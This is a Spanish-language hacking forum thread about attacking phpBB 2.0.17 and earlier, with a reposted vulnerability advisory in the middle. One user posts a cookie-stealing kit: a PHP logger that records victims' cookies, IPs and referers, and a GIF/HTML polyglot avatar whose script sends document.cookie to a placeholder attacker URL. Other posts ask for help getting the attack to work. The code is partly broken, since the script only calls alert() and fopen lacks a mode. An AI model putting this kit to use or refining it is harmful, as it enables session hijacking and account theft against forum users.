Nuevo bug en los phpbb<=2.0.17

[Joker_dxz]

yo tampoco lo entendi mucho

aber primero se crea con el phpedit un archivo con el codigo.

luego que hago con esto:

<GIF89aŸ8÷™fÿ™™><html><head><script>alert('http://yoursite/cookies.php?c='+document.cookie);</script></head></html>

lo inserto en el archivo config.php por algun lao??

[sirdarckcat]

esto mas que vulnerabilidad de phpBB es vulnerabilidad de internet explorer.. que aunque phpBB tiene la culpa por no fijarse si es una imagen.. internet explorer es el que permite ejecutar el codigo... que aunque no lo ejecuta activamente lo ejecuta pasivamente, yo no me habia fijado en este detalle, y pensaba que no funcionaba este mendigo bug.. pero al parecer si hace el intento que es mas que suficiente.

[korgzak]

PHPBB + Internet Explorer = Catastrofe

[dxr]

Esta muy bien mousehack .

[Joker_dxz]

PHPBB + Internet Explorer = Catastrofe

PHPBB + Internet Explorer + windows + norton = 

[Ipargorri]

si como se comenta antes es mas una vulnerabilidad de i.explorer
con firefox funcionaria tambien?

[Dinio_Albino]

He creado un foro en phpBB con version por debajo de 2.0.17 y he subido el archivo cookie.php y después subí el avatar y despues visito un post del otro susuario, pero no me crea ningún log.txt, todo esto con internet explorer.

¿por qué no funciona?

[0000000000000]

---------------------------
PARA LOS INDIOS
---------------------------
===============

phpBB: Ejecución de código arbitrario / SQL injection / Evasión de protección
Se han descubierto vulnerabilidades en phpBB (utilizado para definir y administrar foros de discusión, noticias, etc.), las cuales podrían ser explotadas por un atacante para ejecutar código HTML y PHP arbitrario o efectuar "SQL injection" en un sistema vulnerable.

Resumen
Errores de inicialización de variables podrían ser explotados por un atacante para ejecutar código HTML y PHP arbitrario o efectuar "SQL injection" en un sistema vulnerable.

Versiones Afectada

Estas vulnerabilidades afectan a las versiones de phpBB 2.0.17 y anteriores.

Detalle
1) Errores en la inicialización de variables:
- La variable "error_msg" en la función "usercp_register.php" no es inicializada correctamente, lo cual puede ser utilizado para inyectar código HTML arbitrario.
- La variable "forward_page" en la función "login.php" no es inicializada correctamente, lo cual puede ser utilizado para inyectar código HTML arbitrario.
- La variable "list_cat" en la función "search.php" no es inicializada correctamente, lo cual puede ser utilizado para inyectar código HTML arbitrario.
- La variable "signature_bbcode_uid" en la función "usercp_register.php" no es inicializada correctamente, lo cual puede ser utilizado para efectuar "SQL injection" de sentencias "field=xxx" en queries que operan en tablas de usuario, cuando la opción "magic_quotes_gpc" se encuentra habilitada.
- La variable "signature_bbcode_uid" en la función "usercp_register.php" puede ser utilizada además para inyectar, por ejemplo, el modificador "e" en el primer parámetro de una sentencia "preg_replace()", lo cual implica que el segundo parámetro será evaluado como código PHP. Como el segundo parámetro es completado enteramente con la firma provista por el usuario, es posible ejecutar cualquier código PHP. Esto puede ser explotado independientemente del seteo de la opción "magic_quotes_gpc".

2) Vulnerabilidades de evasión:
- En PHP5 (5.0.5 o anteriores) es posible registrar, por ejemplo, la variable global "$foobar" proporcionando una variable GET/POST/COOKIE con el nombre "foobar" pero también proporcionando una variable GPC llamada "GLOBALS[foobar]". Si la variable es proporcionada de dicha forma, el código previo no tratará de dessetear "foobar" sino $GLOBALS, lo cual evade completamente la protección.
- Cuando la extensión de la sesión no es iniciada por un llamado a "session_start()", PHP desconoce las variables $_SESSION o $HTTP_SESSION_VARS, lo cual significa que es posible llenarlas con cualquier valor, si "register_globals se encuentra habilitado. Combinado con el hecho que "array_merge()" no funcionará en PHP5, cuando al menos uno de los parámetros no es un arreglo, es posible que un atacante setee HTTP_SESSION_VARS a una cadena, evadiendo toda la protección, ya que "$input" termina vacía.
- Cuando "register_long_array" se encuentra deshabilitada, PHP no desconoce las variables HTTP_*. Esto implica que pueden ser completadas con cualquier contenido, aún no relacionado con las variables globales existentes. En este caso la protección no funciona.

Impacto
El impacto de estas vulnerabilidades es ALTO.

Recomendaciones

Recomendamos actualizar phpBB a la versión 2.0.18:

http://www.phpbb.com/downloads.php

Referencias
Para más información sobre este boletín:

Aviso original:
http://www.hardened-php.net/advisory_172005.75.html

Secunia:
http://secunia.com/advisories/17366/

phpBB:
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=336756

[fackie]

por ejemplo hagamos algo asi para realizar un robo de cookie...

creamos un archivo llamado cookie.php con el siguiente codigo:

Código [Seleccionar] Expandir

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt'); // chmod 777 and same directory
fwrite($fp, '<br>Cookie: '.$cookie.'</br> IP: ' .$ip. '<br> Date and Time: ' .$date. '</br> Referer: '.$referer.' ');
fclose($fp);
?>

este codigo creara un archivo log.txt con permiso 777

ahora creamos un avatar para subir a la web vulnerable con el siguiente codigo:

Código [Seleccionar] Expandir

<GIF89aŸ8÷™fÿ™™><html><head><script>alert('http://yoursite/cookies.php?c='+document.cookie);</script></head></html>

y lo guardamos, recordando ponerle la extension .GIF

Salu2

como as contruido ese codigo?
podrias explicar como hacerlo plz ^^

[manware]

<GIF89aŸ8÷™fÿ™™>

Alguien podria dar la cadena hexadecimal correcta?...

Cuando subo la imagen a un 2.0.17  me tira este error de validación:

"El avatar debe tener menos de 80 pixels de ancho por 80 pixels de alto"

Supongo que no esta entendiendo bien la cabecera del Gif.

Gracias.